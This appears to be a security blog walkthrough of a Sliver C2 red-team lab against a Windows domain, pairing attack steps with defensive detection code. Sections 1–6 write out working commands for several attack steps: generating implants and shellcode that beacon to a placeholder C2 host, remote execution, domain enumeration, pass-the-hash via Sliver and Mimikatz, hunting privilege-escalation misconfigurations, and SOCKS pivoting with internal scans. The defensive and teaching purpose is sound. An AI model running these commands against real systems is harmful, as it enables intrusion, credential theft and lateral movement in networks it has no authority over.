
Introduction:
Command and Control (C2) frameworks like Sliver are revolutionizing red team operations and, by extension, modern cyber attacks. This article deconstructs a real-world red team lab scenario to provide the essential commands and techniques for both offensive security testing and defensive hardening. Understanding these workflows is critical for building resilient security postures against advanced persistent threats.
Learning Objectives:
- Master the fundamental commands for Sliver C2 operations and Active Directory enumeration.
- Understand the process of lateral movement and privilege escalation in a Windows domain.
- Learn defensive configurations and detection rules to mitigate these attack vectors.
You Should Know:
1. Establishing the C2 Infrastructure with Sliver
Sliver is an open-source C2 framework used by security professionals and adversaries alike. The initial step involves setting up the server and generating implants.
Verified Commands:
Start the Sliver server
sliver-server
Generate a Windows executable implant
generate --mtls your-c2-server.com --os windows --arch amd64 --save /tmp/
Generate a shellcode payload for in-memory execution
generate --mtls your-c2-server.com --format shellcode --save /tmp/shellcode.bin
List active implants
implants
Step-by-step guide:
The operator first starts the Sliver server. Using the `generate` command, a tailored implant (e.g., a Windows EXE) is created, configured to beacon back to the C2 server over an mTLS listener. The `implants` command is then used to manage active sessions. Defenders should monitor for unknown processes making outbound TLS connections and employ network segmentation to limit C2 communication.
2. Initial Compromise and Foothold
Gaining initial access often involves social engineering or exploiting public-facing applications. Once executed, the implant establishes a secure channel.
Verified Commands:
In the Sliver console, interact with a session
sessions -i <session_id>
Get system information from the compromised host
info
Execute a command on the remote system
execute -o "whoami /all"
Step-by-step guide:
After the user executes the payload, a session appears in the Sliver console. The operator uses `sessions -i` to interact with it. The `info` command provides critical system details, and `execute` runs commands remotely. Blue teams can detect this by auditing process creation events (e.g., Windows Event Code 4688) for child processes spawned by uncommon parent processes.
3. Active Directory Enumeration
With a foothold, attackers map the domain to identify users, groups, and computers for lateral movement.
Verified Windows Commands:
Discover the domain name
net view /all
Enumerate all domain users
net user /domain
Enumerate domain groups, especially privileged ones
net group "Domain Admins" /domain
List all computers joined to the domain
net group "Domain Computers" /domain
Find shared drives on the network
net view \\target-computer
Step-by-step guide:
Using built-in Windows commands, an attacker gathers a blueprint of the Active Directory environment. `net user /domain` lists all domain accounts, which can be used for password spraying attacks. `net group "Domain Admins" /domain` identifies high-value targets. Defenders should implement strict logging and alerting on these `net` commands, especially when run from non-administrative workstations.
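The detections sections 2 and 3 call for (child processes from uncommon parents, and `net` domain enumeration from ordinary workstations) both run over the same telemetry, Security Event ID 4688. The following is an added example written for this article, not code from the original post or from the Sliver project: three rules evaluated over constructed 4688 records. It assumes the records carry the command line, which on Windows requires the "Include command line in process creation events" policy in addition to process creation auditing; the host names, the admin-workstation set and the sample records are all constructed.

```python
"""Process-creation (Event ID 4688) detection logic for the foothold and
enumeration stages described above. Added example, not code from the article
or from Sliver; field names follow the 4688 schema, everything else (host
names, admin-workstation set, sample records) is constructed."""
import re
from dataclasses import dataclass

# Office parents that should almost never spawn a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}
# Privileged access workstations where domain enumeration is expected (assumption).
ADMIN_WORKSTATIONS = {"PAW-01", "PAW-02"}
# Path fragments that mark user-writable staging locations.
USER_WRITABLE = ("\\downloads\\", "\\appdata\\local\\temp\\", "\\users\\public\\")

# net/net1 user|group|localgroup ... /domain, the commands listed in section 3.
NET_DOMAIN_ENUM = re.compile(
    r"\bnet1?(?:\.exe)?\s+(?:user|group|localgroup)\b.*\s/domain\b", re.IGNORECASE)
PRIVILEGED_GROUP = re.compile(
    r'"(?:domain admins|enterprise admins|schema admins)"', re.IGNORECASE)


@dataclass(frozen=True)
class Alert:
    rule: str
    severity: str
    computer: str
    command_line: str


def _image_name(path: str) -> str:
    """Lower-cased file name of a full image path."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze_4688(events):
    """Run the three rules over 4688 records (dicts keyed by event field name)."""
    alerts = []
    for ev in events:
        image = ev["NewProcessName"]
        child = _image_name(image)
        parent = _image_name(ev["ParentProcessName"])
        cmd = ev.get("CommandLine", "")
        host = ev["Computer"]

        # Rule 1: shell or script host spawned by an Office application.
        if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
            alerts.append(Alert("script_host_from_office_parent", "high", host, cmd))

        # Rule 2: executable launched from a user-writable staging directory.
        if any(marker in image.lower() for marker in USER_WRITABLE):
            alerts.append(Alert("exec_from_user_writable_path", "medium", host, cmd))

        # Rule 3: net/net1 domain enumeration outside the admin workstations;
        # naming a privileged group raises the severity.
        if NET_DOMAIN_ENUM.search(cmd) and host not in ADMIN_WORKSTATIONS:
            severity = "high" if PRIVILEGED_GROUP.search(cmd) else "medium"
            alerts.append(Alert("net_domain_enumeration", severity, host, cmd))
    return alerts


SAMPLE_4688 = [  # constructed records, not real telemetry
    {"Computer": "WS-117",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": r'cmd.exe /c "C:\Users\alice\AppData\Local\Temp\update.exe"'},
    {"Computer": "WS-117",
     "NewProcessName": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "update.exe"},
    {"Computer": "WS-117",
     "NewProcessName": r"C:\Windows\System32\net1.exe",
     "ParentProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": r'C:\Windows\system32\net1 group "Domain Admins" /domain'},
    {"Computer": "PAW-01",
     "NewProcessName": r"C:\Windows\System32\net.exe",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net user /domain"},
    {"Computer": "WS-042",
     "NewProcessName": r"C:\Windows\explorer.exe",
     "ParentProcessName": r"C:\Windows\System32\userinit.exe",
     "CommandLine": r"C:\Windows\Explorer.EXE"},
]

if __name__ == "__main__":
    for alert in analyze_4688(SAMPLE_4688):
        print(f"[{alert.severity}] {alert.rule} on {alert.computer}: {alert.command_line}")
```

Note that `net` hands most domain queries to `net1.exe`, so the rule matches both image names; the same `net user /domain` on a host in `ADMIN_WORKSTATIONS` is deliberately left silent, which is the baselining the section's "non-administrative workstations" qualifier implies.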
4. Lateral Movement via Pass-the-Hash
Using compromised credentials, attackers move laterally between systems.
Verified Commands:
In Sliver, use the pth command to Pass-the-Hash
pth --user <Username> --domain <Domain> --ntlm <NTLM_hash> --pid <explorer_pid>
Alternatively, use Mimikatz through Sliver's execute command
execute -o "C:\tools\mimikatz.exe \"privilege::debug\" \"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>\" exit"
Step-by-step guide:
The `pth` command in Sliver injects a compromised NTLM hash into a specific process (like Explorer), creating a new logon session with the stolen credentials. This allows the operator to access network resources as that user. To mitigate this, defenders should enforce NTLMv2 or, ideally, Kerberos authentication, and use Credential Guard on Windows 10/11 and Server 2016+.
5. Privilege Escalation to Domain Admin
The final goal is to obtain Domain Administrator privileges, often by exploiting misconfigurations.
Verified Commands:
PowerView script for finding misconfigured services
Get-NetService -SPN | Select name, startname, path
Check for unquoted service paths
Get-WmiObject -Class Win32_Service | Where-Object {$_.PathName -notlike "`"*" -and $_.PathName -like "* *"} | Select Name, DisplayName, State, PathName
Check for vulnerable GPO settings
Get-DomainGPO -Properties DisplayName, GPCFileSysPath | ForEach-Object { if (Test-Path (Join-Path $_.GPCFileSysPath "Machine\Preferences\Groups\Groups.xml")) { $_.DisplayName } }
Step-by-step guide:
These PowerView and WMI commands help identify common privilege escalation vectors. An unquoted service path allows an attacker to place a malicious executable in a path that is run before the legitimate service binary. Modifiable GPO preferences can reveal credentials in `Groups.xml` files. Regular system hardening audits and using tools like BloodHound for defensive posture analysis are essential countermeasures.
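The same two checks, written as an offline audit so the logic can be run against an exported service table and the Groups.xml files under SYSVOL. This is an added example, not code from the article or from PowerView; the service rows and the Groups.xml document are constructed. The unquoted-path check reports the quoted form the service should be corrected to, and the Groups.xml check only reports that a `cpassword` attribute is present, which is the finding that matters for remediation (remove the preference item, rotate the password).

```python
"""Audit helpers for two of the misconfigurations the section describes:
unquoted service paths and Group Policy Preference Groups.xml files that still
carry a cpassword attribute. Added example, not the article's code; the
service table and the Groups.xml document below are constructed. Feed it the
output of Get-WmiObject Win32_Service and the files under SYSVOL to use it."""
import re
import xml.etree.ElementTree as ET

# Everything up to and including the first ".exe" is the binary; the rest is arguments.
EXE_PREFIX = re.compile(r"(.+?\.exe)\b", re.IGNORECASE)


def unquoted_service_paths(services):
    """services: iterable of (Name, PathName). Returns (name, path, quoted_fix)
    for every path that contains a space and is not wrapped in quotes."""
    findings = []
    for name, path in services:
        p = path.strip()
        if p.startswith('"'):
            continue                       # already quoted, nothing to do
        m = EXE_PREFIX.match(p)
        binary = m.group(1) if m else p    # drop arguments after the binary
        if " " in binary:
            args = p[len(binary):]
            findings.append((name, path, f'"{binary}"{args}'))
    return findings


def gpp_cpassword_entries(groups_xml):
    """Return the user names in a Groups.xml whose Properties carry cpassword.
    Presence alone is the finding: such items must be removed from SYSVOL and
    the passwords rotated."""
    root = ET.fromstring(groups_xml)
    hits = []
    for user in root.iter("User"):
        props = user.find("Properties")
        if props is not None and props.get("cpassword"):
            hits.append(props.get("userName") or user.get("name"))
    return hits


SAMPLE_SERVICES = [  # constructed Win32_Service rows (Name, PathName)
    ("GoodSvc", r'"C:\Program Files\Vendor\agent.exe" -run'),
    ("NoSpaceSvc", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("BadSvc", r"C:\Program Files\Vendor\Agent Service\agent.exe -run"),
]

SAMPLE_GROUPS_XML = """<Groups>
  <User name="LocalAdmin" changed="2024-01-01 10:00:00">
    <Properties action="U" userName="LocalAdmin" cpassword="CONSTRUCTED-PLACEHOLDER"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"/>
  </User>
  <User name="Helpdesk">
    <Properties action="U" userName="Helpdesk" acctDisabled="0"/>
  </User>
</Groups>"""

if __name__ == "__main__":
    for name, path, fix in unquoted_service_paths(SAMPLE_SERVICES):
        print(f"{name}: unquoted path, set ImagePath to {fix}")
    for user in gpp_cpassword_entries(SAMPLE_GROUPS_XML):
        print(f"Groups.xml stores a cpassword for {user}")
```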
6. Pivoting and Internal Reconnaissance
Once privileged access is gained, attackers pivot to other network segments.
Verified Sliver & System Commands:
In Sliver, set up a SOCKS proxy for pivoting
socks5 1080
Perform a port scan from the compromised host through the proxy
execute -o "C:\tools\nmap.exe -sS -p 445,3389,5985 10.10.20.0/24"
Add a new route in Sliver for the internal network
route add 10.10.20.0/24 <session_id>
Step-by-step guide:
The `socks5` command creates a proxy tunnel through the compromised host, allowing the attacker’s tools to route traffic into the internal network. The `route add` command tells Sliver to use a specific session for C2 traffic to that subnet. Network monitoring for unusual internal scanning patterns and implementing micro-segmentation can drastically limit an attacker’s ability to pivot.
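The "unusual internal scanning patterns" the paragraph asks defenders to monitor for reduce to fan-out: one source reaching many distinct hosts on the same administrative ports in a short window. The following is an added example, not code from the article or from Sliver: a sliding-window fan-out detector over constructed flow records, using the ports scanned in the commands above. The one-line-per-flow format is an assumption; NetFlow or firewall exports would be mapped to it first.

```python
"""Fan-out detection for the internal scanning that follows a pivot. Added
example, not the article's or Sliver's code. It assumes one flow record per
line in a constructed format: "<ISO-8601 timestamp> <src_ip> <dst_ip>
<dst_port> <proto> <tcp_flags>"; map your own NetFlow or firewall export to
that shape before calling detect_scanners()."""
from collections import defaultdict
from datetime import datetime, timedelta

ADMIN_PORTS = {445, 3389, 5985}       # the ports scanned in the section above
WINDOW = timedelta(seconds=60)        # observation window per source
THRESHOLD = 10                        # distinct destinations within the window


def parse_flow(line):
    """Parse one constructed flow line into (timestamp, src, dst, port, proto)."""
    ts, src, dst, port, proto = line.split()[:5]
    return datetime.fromisoformat(ts), src, dst, int(port), proto.upper()


def detect_scanners(lines, window=WINDOW, threshold=THRESHOLD):
    """Return {src_ip: max_distinct_destinations} for sources that reach at
    least `threshold` distinct hosts on admin ports inside one window."""
    flows = sorted(parse_flow(line) for line in lines)
    by_src = defaultdict(list)                       # src -> [(ts, dst), ...]
    for ts, src, dst, port, proto in flows:
        if proto == "TCP" and port in ADMIN_PORTS:
            by_src[src].append((ts, dst))

    scanners = {}
    for src, events in by_src.items():
        best = 0
        for i, (start, _) in enumerate(events):     # slide the window start
            seen = set()
            for ts, dst in events[i:]:
                if ts - start > window:
                    break
                seen.add(dst)
            best = max(best, len(seen))
        if best >= threshold:
            scanners[src] = best
    return scanners


# Constructed sample: one host sweeps twelve neighbours on 445 in twelve seconds,
# two others make ordinary single-destination connections.
SAMPLE_FLOWS = [
    f"2024-03-01T09:00:{i:02d} 10.10.5.20 10.10.20.{i + 1} 445 TCP S" for i in range(12)
] + [
    "2024-03-01T09:00:05 10.10.5.21 10.10.20.5 445 TCP S",
    "2024-03-01T09:00:06 10.10.5.21 10.10.20.5 445 TCP S",
    "2024-03-01T09:10:00 10.10.5.22 10.10.20.7 3389 TCP S",
    "2024-03-01T09:10:01 10.10.5.22 10.10.20.7 53 UDP -",
]

if __name__ == "__main__":
    print(detect_scanners(SAMPLE_FLOWS))   # {'10.10.5.20': 12}
```

With micro-segmentation in place the same detector doubles as a policy check: a source that reaches many hosts on 445 or 5985 is either a scanner or a segmentation rule that is broader than intended, and both are worth a ticket.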
7. Defensive Hardening and Detection
Understanding the attack is the first step to building a defense.
Verified SIEM & Command Logging:
Sigma rule to detect Sliver C2 traffic (YAML)
title: Sliver mTLS Beacon Detection
logsource:
  category: proxy
detection:
  sel:
    c-useragent: 'Sliver/'
  condition: sel
Windows Audit Policy to enable command line logging (via GPO)
Audit: Audit process creation -> Success (Includes Command Line in Event 4688)
PowerShell command to enable Module Logging (the key does not exist by default, so create it first; "*" logs every module)
New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Force | Out-Null
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Name "*" -Value "*"
Step-by-step guide:
Defenders must implement deep visibility. The provided Sigma rule detects the Sliver user agent in proxy logs. Enabling process creation auditing and PowerShell module logging captures the command lines and scripts that attackers run. These logs should be aggregated into a SIEM for correlation and alerting, creating a robust detection ecosystem.
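To see what the Sigma rule above actually matches, here is a minimal Sigma-style evaluator run over constructed proxy records. It is an added example, not code from the article and not the Sigma project's reference tooling; rules are written as Python dicts in the same shape the YAML loads to, and the `contains`, `startswith`, `endswith` and `re` modifiers plus `and`/`or`/`not` conditions are the subset implemented here. It makes two points the paragraph does not: a bare `c-useragent: 'Sliver/'` is an exact match, so a user agent with anything after the slash never fires and a `|contains` modifier is needed; and a proxy only logs a user agent for HTTP(S) it terminates, so a beacon on the mTLS listener from section 1 carries no header a proxy rule can see and has to be caught at the network level (the unexpected outbound TLS the section 1 guide points to) instead.

```python
"""A minimal Sigma-style matcher, added here to show what the rule in the
section above actually does when applied to proxy records. Not the article's
code and not the Sigma project's reference implementation; rules are written as
Python dicts (the YAML loaded into the same shape), and the proxy records are
constructed. Supported modifiers: contains, startswith, endswith, re."""
import re


def _match_field(record, field_spec, expected):
    """One 'field|modifier: value(s)' entry; a list of values is an OR."""
    name, _, modifier = field_spec.partition("|")
    actual = record.get(name)
    if actual is None:
        return False
    values = expected if isinstance(expected, list) else [expected]
    a = str(actual)
    for v in values:
        e = str(v)
        if modifier == "" and a == e:
            return True
        if modifier == "contains" and e in a:
            return True
        if modifier == "startswith" and a.startswith(e):
            return True
        if modifier == "endswith" and a.endswith(e):
            return True
        if modifier == "re" and re.search(e, a):
            return True
    return False


def _selection_matches(record, selection):
    """A mapping is an AND of its fields; a list of mappings is an OR."""
    if isinstance(selection, list):
        return any(_selection_matches(record, s) for s in selection)
    return all(_match_field(record, k, v) for k, v in selection.items())


def _eval_condition(tokens, results):
    """Evaluate 'a and not b or c' over selection results (not > and > or)."""
    pos = 0

    def parse_or():
        nonlocal pos
        value = parse_and()
        while pos < len(tokens) and tokens[pos] == "or":
            pos += 1
            value = parse_and() or value
        return value

    def parse_and():
        nonlocal pos
        value = parse_not()
        while pos < len(tokens) and tokens[pos] == "and":
            pos += 1
            value = parse_not() and value
        return value

    def parse_not():
        nonlocal pos
        if tokens[pos] == "not":
            pos += 1
            return not parse_not()
        name = tokens[pos]
        pos += 1
        return results[name]

    return parse_or()


def rule_matches(rule, record):
    """True when the record satisfies the rule's detection block."""
    detection = rule["detection"]
    results = {name: _selection_matches(record, sel)
               for name, sel in detection.items() if name != "condition"}
    return _eval_condition(detection["condition"].split(), results)


def matching_clients(rule, records):
    """Client addresses of the records the rule fires on."""
    return [r["c-ip"] for r in records if rule_matches(rule, r)]


PAGE_RULE = {  # the article's rule as a dict: exact match on the user agent
    "title": "Sliver mTLS Beacon Detection",
    "logsource": {"category": "proxy"},
    "detection": {"sel": {"c-useragent": "Sliver/"}, "condition": "sel"},
}

CONTAINS_RULE = {  # added variant: substring match plus an exclusion filter
    "title": "Sliver user agent substring (added variant)",
    "logsource": {"category": "proxy"},
    "detection": {
        "sel": {"c-useragent|contains": "Sliver/"},
        "filter": {"c-ip": ["10.10.99.5"]},   # constructed: an appliance to exclude
        "condition": "sel and not filter",
    },
}

SAMPLE_PROXY = [  # constructed proxy log records
    {"c-ip": "10.10.5.20", "cs-host": "updates.example.net",
     "c-useragent": "Sliver/0.0-constructed"},
    {"c-ip": "10.10.5.21", "cs-host": "www.example.com",
     "c-useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"},
    {"c-ip": "10.10.99.5", "cs-host": "updates.example.net",
     "c-useragent": "Sliver/0.0-constructed"},
]

if __name__ == "__main__":
    print("exact-match rule fires on:", matching_clients(PAGE_RULE, SAMPLE_PROXY))
    print("contains rule fires on:   ", matching_clients(CONTAINS_RULE, SAMPLE_PROXY))
```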
What Undercode Say:
- The democratization of advanced C2 frameworks like Sliver has permanently lowered the barrier to entry for sophisticated attacks, making high-level tradecraft accessible to less experienced threat actors.
- Defensive strategies must evolve from pure prevention to assume-breach detection and response, focusing on robust logging, behavioral analytics, and minimizing attack paths within Active Directory.
The completion of this lab by an aspiring professional highlights a critical shift in cybersecurity education. Hands-on, offensive training is becoming mainstream, producing a new generation of defenders who think like attackers. This is a net positive for the industry. The technical walkthrough demonstrates that while the initial tools may be new, the underlying techniques—enumeration, lateral movement, privilege escalation—are timeless. The real vulnerability is often not a zero-day exploit, but an accumulation of misconfigurations and a lack of foundational security controls. Organizations that fail to implement basic hardening, credential hygiene, and network segmentation are effectively operating at a constant tactical disadvantage.
Prediction:
The proliferation of open-source C2 frameworks will lead to a surge in modular, multi-platform attacks that are harder to attribute and detect. In response, defensive AI will mature beyond signature-based detection to model normal user and network behavior, automatically flagging deviations indicative of a Sliver-like compromise. The future battleground will be in the memory space, with attackers increasingly using fileless techniques and defenders deploying advanced memory scanning and EDR solutions at the kernel level.
Reported By: Mouhammad El – Hackers Feeds


